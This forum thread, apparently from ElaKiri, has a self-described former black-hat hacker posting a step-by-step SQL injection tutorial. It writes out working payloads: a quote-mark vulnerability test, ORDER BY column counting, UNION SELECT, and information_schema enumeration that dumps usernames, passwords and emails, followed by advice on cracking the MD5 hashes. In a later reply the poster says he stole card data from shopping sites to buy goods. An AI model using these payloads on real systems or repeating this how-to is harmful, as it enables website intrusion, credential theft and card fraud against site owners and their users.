WebSite Hacking Full [Tut]

[Ethical_World]

Well 1st I will Introduce my Self .. Im was a Black Hat Hacker for 3 years
.. I did
1 . About 150 site Defaced
2 . 5 major Virus
3 . morethan 200 computers BOxed
4 . Many Many Credit Card Farwds

, and did many things so I cant revile my really Identity But Now Im a White Hat Hacker .. an Ethical Hacker if u wana call .

So this Tut is wrote by own Hand Didn't copy it from anywhere
Coz Elakiri Deserv The Best

There are cople ways to Hack Into a Website

1. Sql injection
2. RFI
3. LFI
4. Xss
5. Otherways

well in Sql Injection is the most famous thing so I will teach you about SQL with Pic !

Sql Injection
​

What is SQL Injection?

SQL Injection is something like. In the very simple way when you inject a Site you can get

Admin User Name (Root)
Admin password (Root)
Other admins pass
Every User Name
Every User Pass
Cridit Card Info ( Every Detail )


How you Find a Site Venurable or not

Lets Say I have a Site

[URL="http://www.website.com/shop.php?id=10"]http://www.website.com/shop.php?id=10[/URL]

to see it HackAble or not Put ' in the End
So it Shoud look like

[URL="http://www.website.com/shop.php?id=10"]http://www.website.com/shop.php?id=10'[/URL]

And If it Give you a MYSQL Error ..That mean the Site is Hack Able

Ok Next Step is

so Now We Know the Site is Venul or not .
Now We Have get trought This to Hack into admin

1. Finding the number of columns
2. Check if UNION works.
3. Looking for a visible column
3. Check if the version is > 5
4. Extracting table names, column names, etc... (Or bruteforcing if the version is < 5)
5. Forming the finishing query to extract our required information.

Finding the number of columns

[URL="http://www.website.com/shop.php?id=10+order+by+1--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+1--"].com/shop.php?id=10+order+by+1--[/URL]

(You shoul not get any error)

[URL="http://www.website.com/shop.php?id=10+order+by+10000--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+10000--"].com/shop.php?id=10+order+by+10000--[/URL]

(You should get an error)

If u get a Error The Next Step is to Get the number of columns

[URL="http://www.website.com/shop.php?id=10+order+by+2--"]http://www.Site.com/shop.php?id=10+order+by+2--[/URL]
[URL="http://www.website.com/shop.php?id=10+order+by+3--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+3--"].com/shop.php?id=10+order+by+3--[/URL]
[URL="http://www.website.com/shop.php?id=10+order+by+4--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+4--"].com/shop.php?id=10+order+by+4--[/URL]
[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+5--[/URL] 
[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+6--[/URL]
[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+7--[/URL]

<--- Keep Injecting until you get an error,
for me it's when order by 7 in my Pic

Check if UNION works.

So Now we Know Our site has 6 columns so What u sould do now is
Put it in a order like

[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,2,3,4,5,6--

Looking for a visible column

Now you should get a see a Number in the screen Some were For me its
2 ( Its highlighted )

Check if the version is > 5

Now We need to check if the version is > 5 (VERY VERY IMPORTANT STEP)
For This , I pick our visible column...in this case it is 2...and we must replace it with "@@version"

For Ex :

[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,@@version,3,4,5,6--

Now you will Able to see the MYSQL Ver Like this

You should FIRST CHECK IF IT IS GREATER THAN 5, now..
If it is, you can proceed or you HAVE TO GUESS THE TABLE NAMES IF ITS BELOW version 5.
Extracting table names, column names, etc...

now we must Get
1. Database names
2. Table names
3. Column names

DataBase Names :

Now This is the Confusing PartSo Stay with me

Now we are gona get the Database Name and user all together since we know the visible column

[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6--

Many peple get confuse with "concat_ws"It actually means concat with separator and the separator we use should be given in the starting of the syntax.Here I used 0x3a whose equivalent is “:” . The main purpose of using this is getting the output in desired format as we need it to be.(copied)

Now lets see what Are this
Version() :— Version()is use to inject version of the MySql used in the server
User() :- This will Inject registered MySql user in the database.
Database () :- is the DataBase Name
Now That will Give you somthing like This

Grab the Database using Information_schema

[URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.website.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(schema_name),3,4,5,6 +from+information_schema.schemata—

What is This
1. +from+information_schema.schemata :- returns the databases on the server
We may get the database name depending on the no of databases present.
Like If you get something like this

Sigma is the DataBase Name

Extracting table names:
Now we know the DataBase Name What we need now is MySql Table Names
I've picked the database 'users' to extract our table names.
we have to use the database information_schema and the table tables and the column table_name to extract the respective table names.
So It Should be like

[URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.Site.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(table_name),3,4 ,5,6+from+information_schema.tables—

This is give you more than we need .. Like Every Junkin DB.

So We Only need tables for the table users. So Now we go up with

[URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.Site.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema='users'—

If it didnt respose you properly Some Times you have Hex the "Users" when "Users"Hex it get "0x7573657273"
So it sould be like
http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema='0x7573657273'—
Now you sould get a Table Name I'll take the table USERS for example.

column names:
Now we gona get the Data from the table named “USERS” and we extract various columns from it.

[URL="http://www.website.com/shop.php?id=10+UNION+SELECT+1,group_concat%28column_name"]www.Site.com/shop.php?id=10+UNION+SE ... olumn_name[/URL]),3,4,5,6+from+information_schema.columns+where+table_name='USERS'--

In that I have change group_concat(table_name) to group_concat(column_name) becourse now we are looking for columns .
column_name extracts all column names present in the table.
And add this to the end of the columns
+from+information_schema.columns+where+table_name='USERS'—
it will show you the columns lets think table are username,password and email.

http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email) ,3,4+from+USERS—

Now you are done .. anyways I only needed Admin User Name so i did it in a another way

If it comes with a number you need to Crack it .. you can use a Online MD5
cracker for that



This is Only for Knowledge .. Im not responsible for what you do with Knowledge

 

[Gamerz9]

Credit Card Frauds ? How ?

 

[nadman]

Wow good stuff bro.
I am still in the process of reading this tute.
I must save the page and read it slowly!
Thanks for the info and keep posting!

 

[Ethical_World]

Credit Card Frauds ? How ?

Hacking into shoping site's geting Cridit card numbers and Info then buy things online .. But Im out of those now ...

 

[maaga]

nice post man keep posting

 

[FUNasela]

Ela machan !! pahadiliwa dala thiyanawa

 

[x-pert]

You're saying ElaKiri deserves the best. And that you have written it by your own hand bla bla.

This is not what ElaKiri deserves. ElaKiri is not a hacking forum.

Teach the people how to prevent from hacking/ hackers if you're really an Ethical Hacker.

On a second thought, this is NOT written by you.
The rule number 1 of Ethical hacking is: give credit to others when and where its due.
This is an article written by curFew and DaSteem of h4cky0u.org.

Cached source

 

[Gamerz9]

yeah h4cky0u guys are the best when it comes to SQL Injection

 

[DJ ASHAN]

ok machan............... thankz..................

 

[Ethical_World]

You're saying ElaKiri deserves the best. And that you have written it by your own hand bla bla.

This is not what ElaKiri deserves. ElaKiri is not a hacking forum.

Teach the people how to prevent from hacking/ hackers if you're really an Ethical Hacker.

On a second thought, this is NOT written by you.
The rule number 1 of Ethical hacking is: give credit to others when and where its due.
This is an article written by curFew and DaSteem of h4cky0u.org.

Cached source

yeah some parts were hard to explain .. so I did copy things .. Put not exactly copyied ..

and yeah I was a old member was in h4cky0u ,, and Im still in h4cky0u

 

[Isuru Nayanajith Bandara]

thnkx bro useful info

 

[nelik]

machan thanxxxx kavada hari ona vei

 

[mawella]

mamanam meewata sa me ne

 

[Ethical_World]

I'll teach you guys next about RFI

 

[keveen]

Nice work!!

 

[princeofpersia2008]

marune

 

[shan4djfun]

HACKING THIS IS MORE LIKE COPYING....HAY ETHICAL HOOKER WHAT ARE THE MAJOR VIRESES YOU DID. I"M PRETTY SURE YOU COPYD DAT TOO

 

[umlushan]

ela

 

[thicps]

mata nam meka _ _ _ _ harapa wage..bt kiyawala balannam..

 

[Wolverine GTR]

Elazzzzzzzzzzzz